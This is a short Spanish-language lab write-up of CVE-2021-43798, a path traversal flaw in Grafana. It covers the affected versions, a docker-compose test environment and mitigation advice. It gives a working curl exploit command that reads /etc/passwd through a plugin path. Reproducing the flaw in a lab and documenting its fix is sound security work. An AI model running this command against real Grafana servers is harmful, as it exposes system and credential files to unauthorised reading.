CVE-2021-43798
1. Resumen
- Grafana es una plataforma de código abierto que soporta funciones de monitoreo y gestión de datos. En las versiones siguientes existe una vulnerabilidad de Path Traversal que permite manipular la ruta de archivos mediante caracteres especiales como ../.
- 8.0.0 y superiores, anteriores a 8.0.7
- 8.1.0 y superiores, anteriores a 8.1.8
- 8.2.0 y superiores, anteriores a 8.2.7
- 8.3.0
- La ruta vulnerable es <grafana_host_url>/public/plugins/<plugin_id>/, donde <plugin_id> es el ID del plugin instalado. Se puede confirmar la ruta vulnerable a través del siguiente material.
2. Configuración y ejecución del entorno vulnerable
2.1 Entorno utilizado
2.2 Método de ejecución
docker-compose up -d
3. Reproducción de la vulnerabilidad
- Verificar pantalla abierta
- Resultado de la ejecución
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd Se pudo acceder a etc/passwd.
4. Conclusión (Medidas de mitigación)
- Si se utiliza una versión afectada por la vulnerabilidad, se debe actualizar a la versión parcheada 8.3.1, 8.2.7, 8.1.8 u 8.0.7.
- Para prevenir la vulnerabilidad de Path Traversal, se debe aplicar un enfoque de lista blanca que solo permita el acceso a rutas autorizadas, y realizar validación de la entrada del usuario y normalización de rutas para restringir el acceso a rutas anómalas como el movimiento a directorios superiores (../).
Referencias